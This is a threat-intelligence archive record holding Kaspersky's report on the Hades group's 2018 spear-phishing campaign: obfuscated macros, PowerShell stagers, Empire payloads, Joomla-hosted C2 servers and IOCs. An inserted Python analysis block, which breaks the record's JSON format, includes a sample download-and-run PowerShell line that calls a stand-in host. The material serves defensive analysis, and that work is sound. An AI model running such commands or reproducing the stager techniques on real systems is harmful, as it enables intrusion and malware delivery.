{
	"id": "d871bad9-8ce9-4586-8fed-9bede916955f",
	"created_at": "2026-04-06T00:20:07.032614Z",
	"updated_at": "2026-04-10T03:37:50.475913Z",
	"deleted_at": null,
	"sha1_hash": "97a0b7ff3bd751eddc43f2b0fc62f7261f0bcde0",
	"title": "Hades, the actor behind Olympic Destroyer is still alive",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 916342,
	"plain_text": "Hades, the actor behind Olympic Destroyer is still alive\r\nBy GReAT\r\nPublished: 2018-06-19 · Archived: 2026-04-05 16:11:38 UTC\r\nIn March 2018 we published our research on Olympic Destroyer, an advanced attack that hit organizers, suppliers\r\nand partners of the Winter Olympic Games 2018 held in Pyeongchang, South Korea. Olympic Destroyer was a\r\ncyber-sabotage attack based on the spread of a destructive network worm. The sabotage stage was preceded by\r\nreconnaissance and infiltration into target networks to select the best launchpad for the self-replicating and self-modifying destructive malware.\r\nWe are calling the actor behind the Olympic Destroyer attack – “Hades”. We have previously emphasized that\r\nHades is different from other threat actors because the whole attack was a masterful operation in deception.\r\nDespite that, the attackers made serious mistakes, which helped us to spot and prove the forgery of rare attribution\r\nartefacts. The attackers behind Olympic Destroyer forged automatically generated signatures, known as Rich\r\nHeader, to make it look like the malware was produced by Lazarus APT, an actor widely believed to be associated\r\nwith North Korea. If this is new to the reader, we recommend a separate blog dedicated to the analysis of this\r\nforgery.\r\nThe deceptive behavior of Hades and its excessive use of various false flags, which tricked many researchers in\r\nthe infosecurity industry, got our attention. Based on malware similarity, the Olympic Destroyer malware was\r\nlinked by other researchers to three Chinese speaking APT actors and the allegedly North Korean Lazarus APT;\r\nsome code had hints of the EternalRomance exploit, while other code was similar to the Netya (Expetr/NotPetya)\r\nand BadRabbit targeted ransomware. 
Kaspersky Lab managed to find lateral movement tools and initial infection\r\nbackdoors, and has followed the infrastructure used to control Olympic Destroyer in one of its South Korean\r\nvictims.\r\nSome of the TTPs and operational security used by Hades during the Olympic Destroyer attack bear a certain\r\nresemblance to Sofacy APT group activity. When it comes to false flags, mimicking TTPs is much harder than\r\ntampering with technical artefacts. It implies a deep knowledge of how the actor being mimicked operates as well\r\nas operational adaptation to these new TTPs. However, it is important to remember that Hades can be considered a\r\nmaster in the use of false flags: for now we assess that connection with low to moderate confidence.\r\nWe decided to keep tracking the Hades group and set our virtual ‘nets’ to catch them again if it showed up with a\r\nsimilar arsenal. To our surprise it has recently resurfaced with new activity.\r\nIn May-June 2018 we discovered new spear-phishing documents that closely resembled weaponized documents\r\nused by Hades in the past. This and other TTPs led us to believe that we were looking at the same actor again.\r\nHowever, this time the attacker has new targets. According to our telemetry and the characteristics of the analyzed\r\nspear-phishing documents, we believe the attackers are now targeting financial organizations in Russia, and\r\nbiological and chemical threat prevention laboratories in Europe and Ukraine. They continue to use a non-binary\r\nexecutable infection vector and obfuscated scripts to evade detection.\r\nhttps://securelist.com/olympic-destroyer-is-still-alive/86169/\r\nPage 1 of 13\n\nSimplified infection procedure\r\nInfection Analysis\r\nIn reality the infection procedure is a bit more complex and relies on multiple different technologies, mixing VBA\r\ncode, Powershell, MS HTA, with JScript inside and more Powershell. 
Let’s take a look at this more closely to let\r\nincident responders and security researchers recognize such an attack at any time in the future.\r\nOne of the recent documents that we discovered had the following properties:\r\nMD5: 0e7b32d23fbd6d62a593c234bafa2311\r\nSHA1: ff59cb2b4a198d1e6438e020bb11602bd7d2510d\r\nFile Type: Microsoft Office Word\r\nLast saved date: 2018-05-14 15:32:17 (GMT)\r\nKnown file name: Spiez CONVERGENCE.doc\r\nThe embedded macro is heavily obfuscated. It has randomly generated variable and function names.\r\nObfuscated VBA macro\r\nIts purpose is to execute a Powershell command. This VBA code was obfuscated with the same technique used in\r\nthe original Olympic Destroyer spear-phishing campaign.\r\nIt starts a new obfuscated Powershell scriptlet via the command line. The obfuscator uses array-based\r\nrearranging to mutate the original code, and protects all commands and strings, such as the command and control (C2)\r\nserver address.\r\nThere is one known obfuscation tool used to produce such an effect: Invoke-Obfuscation.\r\nObfuscated commandline Powershell scriptlet\r\nThis script disables Powershell script logging to avoid leaving traces:\r\nIt has an inline implementation of the RC4 routine in Powershell, which is used to decrypt additional payload\r\ndownloaded from Microsoft OneDrive. The decryption relies on a hardcoded 32-byte ASCII hexadecimal alphabet\r\nkey. 
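As an added illustration (example code written for this page, not the actor's script and not code from the original post), the following Python reproduces the decryption step described above and adds the check an analyst would run on what comes out: a plain RC4 routine keyed with a 32-byte ASCII hexadecimal alphabet key recovers the next stage, and any download URL found in it is compared against the Joomla component directories listed under Infrastructure below. The key, the stage text and the example.invalid host are constructed for the demonstration; the ciphertext is produced inside the block itself, since RC4 is symmetric.

```python
from urllib.parse import urlsplit

# Added example, not code from the Hades samples. It reproduces the stager
# behaviour the analysis describes: an inline RC4 routine keyed with a 32-byte
# ASCII hexadecimal alphabet key decrypts the next stage, and that stage names
# the URL it fetches from the C2 server.


def rc4(key: bytes, data: bytes) -> bytes:
    '''Textbook RC4 (KSA then PRGA). The same call encrypts and decrypts.'''
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


HEX_ALPHABET = frozenset(b'0123456789abcdefABCDEF')


def is_hex_alphabet_key(key: bytes) -> bool:
    '''The stagers hardcode a 32-byte key drawn only from ASCII hex digits.'''
    return len(key) == 32 and all(b in HEX_ALPHABET for b in key)


# Joomla component directories that appeared in the C2 URI paths (Infrastructure section).
JOOMLA_C2_PREFIXES = (
    '/components/com_tags/',
    '/components/com_finder/',
    '/components/com_j2xml/',
    '/components/com_contact/',
)

# Characters that end a URL inside script text: both quote kinds, brackets and separators.
URL_TERMINATORS = frozenset([chr(34), chr(39), '(', ')', ';', ',', '<', '>'])


def extract_urls(text: str) -> list:
    '''Pull http(s) URLs out of decoded script text without a regex.'''
    urls = []
    for scheme in ('http://', 'https://'):
        start = text.find(scheme)
        while start != -1:
            end = start
            while end < len(text) and not text[end].isspace() and text[end] not in URL_TERMINATORS:
                end += 1
            urls.append(text[start:end])
            start = text.find(scheme, end)
    return urls


def classify_stage_url(url: str) -> dict:
    '''Flag download URLs whose path sits inside a Joomla component directory.'''
    parts = urlsplit(url)
    return {
        'host': parts.hostname,
        'path': parts.path,
        'joomla_component_path': any(parts.path.startswith(p) for p in JOOMLA_C2_PREFIXES),
    }


def decrypt_stage(key: bytes, blob: bytes) -> dict:
    '''Decrypt one downloaded stage and classify every URL it references.'''
    if not is_hex_alphabet_key(key):
        raise ValueError('expected a 32-byte ASCII hex alphabet key')
    text = rc4(key, blob).decode('ascii', errors='replace')
    urls = extract_urls(text)
    return {'plaintext': text, 'urls': urls, 'classified': [classify_stage_url(u) for u in urls]}


# Constructed sample: the key, the stage text and the host are invented for this example.
SAMPLE_KEY = b'0123456789abcdef0123456789abcdef'
SAMPLE_STAGE = b'''IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/components/com_finder/helpers/access.log');'''
SAMPLE_BLOB = rc4(SAMPLE_KEY, SAMPLE_STAGE)  # what a capture of the download would contain


if __name__ == '__main__':
    result = decrypt_stage(SAMPLE_KEY, SAMPLE_BLOB)
    for entry in result['classified']:
        verdict = 'joomla-style C2 path' if entry['joomla_component_path'] else 'other'
        print(entry['host'], entry['path'], verdict)
```

Run as a script it prints the host, the path and whether the path falls inside one of the Joomla component directories; against a real capture the call is the same, with the key lifted from the deobfuscated stager and the downloaded bytes passed as the blob. The key check is deliberately strict, because a stager whose key is not 32 hex characters is not the pattern this page describes and deserves a second look rather than a silent decrypt.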
This is a familiar technique used in other Olympic Destroyer spear-phishing documents in the past and in\r\nPowershell backdoors found in the infrastructure of Olympic Destroyer’s victims located in Pyeongchang.\r\nThe second stage payload downloaded is an HTA file that also executes a Powershell script.\r\nDownloaded access.log.txt\r\nThis file has a similar structure to the Powershell script executed by the macro in spear-phishing attachments.\r\nAfter deobfuscating it, we can see that this script also disables Powershell logging and downloads the next stage\r\npayload from the same server address. It also uses RC4 with a pre-defined key:\r\nThe final payload is the Powershell Empire agent. Below we partially provide the http stager scriptlet for the\r\ndownloaded Empire agent.\r\nPowershell Empire is a free and open-source post-exploitation framework written in Python and Powershell that\r\nallows fileless control of the compromised hosts, has a modular architecture and relies on encrypted\r\ncommunication. 
This framework is widely used by penetration-testing companies in legitimate security tests for\r\nlateral movement and information gathering.\r\nInfrastructure\r\nWe believe that the attackers used compromised legitimate web servers for hosting and controlling malware.\r\nBased on our analysis, the URI paths of the discovered C2 servers included the following:\r\n/components/com_tags/views\r\n/components/com_tags/views/admin\r\n/components/com_tags/controllers\r\n/components/com_finder/helpers\r\n/components/com_finder/views/\r\n/components/com_j2xml/\r\n/components/com_contact/controllers/\r\nThese are known directory structures used by a popular open source content management system, Joomla:\r\nJoomla components path on Github\r\nUnfortunately we don’t know what exact vulnerability was exploited in the Joomla CMS. What is known is that\r\none of the payload hosting servers used Joomla v1.7.3, which is an extremely old version of this software,\r\nreleased in November 2011.\r\nA compromised server using Joomla\r\nVictims and Targets\r\nBased on several target profiles and limited victim reports, we believe that the recent operations by Hades target\r\nRussia, Ukraine and several other European countries. According to our telemetry, several victims are entities\r\nfrom the financial sector in Russia. 
In addition, almost all the samples we found were uploaded to a multi-scanner\r\nservice from European countries such as the Netherlands, Germany and France, as well as from Ukraine and\r\nRussia.\r\nLocation of targets in recent Hades attacks\r\nSince our visibility is limited, we can only speculate about the potential targets based on the profiles suggested by\r\nthe content of selected decoy documents, email subjects or even file names picked by the attackers.\r\nOne such decoy document grabbed our attention. It referred to ‘Spiez Convergence’, a bio-chemical threat\r\nresearch conference held in Switzerland, organized by SPIEZ LABORATORY, which not long ago was involved\r\nin the Salisbury attack investigation.\r\nDecoy document using Spiez Convergence topic\r\nAnother decoy document observed in the attacks (‘Investigation_file.doc’) references the nerve agent used to\r\npoison Sergey Skripal and his daughter in Salisbury:\r\nSome other spear-phishing documents include Russian and German words in their names:\r\n9bc365a16c63f25dfddcbe11da042974 Korporativ.doc\r\nda93e6651c5ba3e3e96f4ae2dd763d94 Korporativ_2018.doc\r\ne2e102291d259f054625cc85318b7ef5 E-Mail-Adressliste_2018.doc\r\nOne of the documents included a lure image with perfect Russian language in it.\r\nA message in Russian encouraging the user to enable macros (54b06b05b6b92a8f2ff02fdf47baad0e)\r\nOne of the most recent weaponized documents was uploaded to a malware scanning service from Ukraine in a file\r\nnamed ‘nakaz.zip’, containing ‘nakaz.doc’ (translated as ‘order.doc’ from Ukrainian).\r\nAnother lure message to encourage the user to enable macros\r\nAccording 
to metadata, the document was edited on June 14th. The Cyrillic messages inside this and previous\r\ndocuments are in perfect Russian, suggesting that it was probably prepared with the help of a native speaker and\r\nnot automated translation software.\r\nOnce the user enables macros, a decoy document is displayed, taken very recently from a Ukrainian state\r\norganization (the date inside indicates 11 June 2018). The text of the document is identical to the one on the\r\nofficial website of the Ukrainian Ministry of Health.\r\nDecoy document inside nakaz.doc\r\nFurther analysis of other related files suggests that the target of this document is working in the biological and\r\nepizootic threat prevention field.\r\nAttribution\r\nAlthough not comprehensive, the following findings can serve as a hint to those looking for a better connection\r\nbetween this campaign and previous Hades activity. More information on overlaps and reliable tracking of Hades’\r\nattacks is available to subscribers of Kaspersky Intelligence Reporting Services (see below).\r\nSimilar obfuscated macro structure\r\nThe documents above show apparent structural similarity, as if they were produced by the same tool and\r\nobfuscator. The highlighted function name in the new wave of attacks isn’t in fact new. While uncommon, a\r\nfunction named “MultiPage1_Layout” was also found in the Olympic Destroyer spear phishing document (MD5:\r\n5ba7ec869c7157efc1e52f5157705867).\r\nSame MultiPage1_Layout function name used in older campaign\r\nConclusions\r\nDespite initial expectations for it to stay low or even disappear, Hades, the actor behind the Olympic Destroyer\r\nattack, has resurfaced with new attacks in Europe, Russia and Ukraine. 
In late 2017, a similar reconnaissance\r\nstage preceded a larger cyber-sabotage stage meant to destroy and paralyze infrastructure of the Winter Olympic\r\nGames as well as related supply chains, partners and even venues at the event location. It’s possible that in this\r\ncase we have observed a reconnaissance stage that will be followed by a wave of destructive attacks with new\r\nmotives. That is why it is important for all bio-chemical threat prevention and research companies and\r\norganizations in Europe to strengthen their security and run unscheduled security audits.\r\nThe variety of financial and non-financial targets could indicate that the same malware was used by several groups\r\nwith different interests – i.e. a group primarily interested in financial gain through cybertheft and another group or\r\ngroups looking for espionage targets. This could also be a result of cyberattack outsourcing, which is not\r\nuncommon among nation state actors. On the other hand, the financial targets might be another false flag\r\noperation by an actor who has already excelled at this during the Pyeongchang Olympics to redirect researchers’\r\nattention.\r\nCertain conclusions could be made based on motives and the selection of targets in this campaign. However, it is\r\neasy to make a mistake when trying to answer the question of who is behind this campaign with only the\r\nfragments of the picture that are visible to researchers. Hades’ Olympic Destroyer-related activities at the\r\nbeginning of this year, with their sophisticated deception efforts, changed the attribution game forever. We believe\r\nthat it is no longer possible to draw conclusions based on few attribution vectors discovered during regular\r\ninvestigation. 
The resistance to and deterrence of threats such as Olympic Destroyer should be based on\r\ncooperation between the private sector and governments across national borders. Unfortunately, the current\r\ngeopolitical situation in the world only boosts the global segmentation of the internet and introduces many\r\nobstacles for researchers and investigators. This will encourage APT attackers to continue marching into the\r\nprotected networks of foreign governments and commercial companies.\r\nThe best thing we can do as researchers is to keep tracking threats like this. We will keep monitoring Hades and\r\nreport on newly discovered activities of this group.\r\nMore details about Hades, Olympic Destroyer and related activity are available to subscribers of Kaspersky\r\nIntelligence Reporting services. Contact: intelreports@kaspersky.com\r\nIndicators Of Compromise\r\nFile Hashes\r\n9bc365a16c63f25dfddcbe11da042974 Korporativ.doc\r\nda93e6651c5ba3e3e96f4ae2dd763d94 Korporativ_2018.doc\r\n6ccd8133f250d4babefbd66b898739b9 corporativ_2018.doc\r\nabe771f280cdea6e7eaf19a26b1a9488 Scan-2018-03-13.doc.bin\r\nb60da65b8d3627a89481efb23d59713a Corporativ_2018.doc\r\nb94bdb63f0703d32c20f4b2e5500dbbe\r\nbb5e8733a940fedfb1ef6b0e0ec3635c recommandation.doc\r\n97ddc336d7d92b7db17d098ec2ee6092 recommandation.doc\r\n1d0cf431e623b21aeae8f2b8414d2a73 Investigation_file.doc\r\n0e7b32d23fbd6d62a593c234bafa2311 Spiez CONVERGENCE.doc\r\ne2e102291d259f054625cc85318b7ef5 E-Mail-Adressliste_2018.doc\r\n0c6ddc3a722b865cc2d1185e27cef9b8\r\n54b06b05b6b92a8f2ff02fdf47baad0e\r\n4247901eca6d87f5f3af7df8249ea825 nakaz.doc\r\nDomains and 
IPs\r\n79.142.76[.]40:80/news.php\r\n79.142.76[.]40:8989/login/process.php\r\n79.142.76[.]40:8989/admin/get.php\r\n159.148.186[.]116:80/admin/get.php\r\n159.148.186[.]116:80/login/process.php\r\n159.148.186[.]116:80/news.php\r\n****.****.edu[.]br/components/com_finder/helpers/access.log\r\n****.****.edu[.]br/components/com_finder/views/default.php\r\nnarpaninew.linuxuatwebspiders[.]com/components/com_j2xml/error.log\r\nnarpaninew.linuxuatwebspiders[.]com/components/com_contact/controllers/main.php\r\nmysent[.]org/access.log.txt\r\nmysent[.]org/modules/admin.php\r\n5.133.12[.]224:333/admin/get.php\r\nNote: this blogpost was updated July 25, 2019, to include Hades as the name of the actor behind the Olympic\r\nDestroyer attack.\r\nSource: https://securelist.com/olympic-destroyer-is-still-alive/86169/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://securelist.com/olympic-destroyer-is-still-alive/86169/"
	],
	"report_names": [
		"86169"
	],
	"threat_actors": [
		{
			"id": "8670f370-1865-4264-9a1b-0dfe7617c329",
			"created_at": "2022-10-25T16:07:23.69953Z",
			"updated_at": "2026-04-10T02:00:04.716126Z",
			"deleted_at": null,
			"main_name": "Hades",
			"aliases": [
				"Operation TrickyMouse"
			],
			"source_name": "ETDA:Hades",
			"tools": [
				"Brave Prince",
				"Gold Dragon",
				"GoldDragon",
				"Lovexxx",
				"Olympic Destroyer",
				"Running RAT",
				"RunningRAT",
				"SOURGRAPE",
				"running_rat"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434807,
	"ts_updated_at": 1775792270,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/97a0b7ff3bd751eddc43f2b0fc62f7261f0bcde0.pdf",
		"text": "https://archive.orkl.eu/97a0b7ff3bd751eddc43f2b0fc62f7261f0bcde0.txt",
		"img": "https://archive.orkl.eu/97a0b7ff3bd751eddc43f2b0fc62f7261f0bcde0.jpg"
	}
}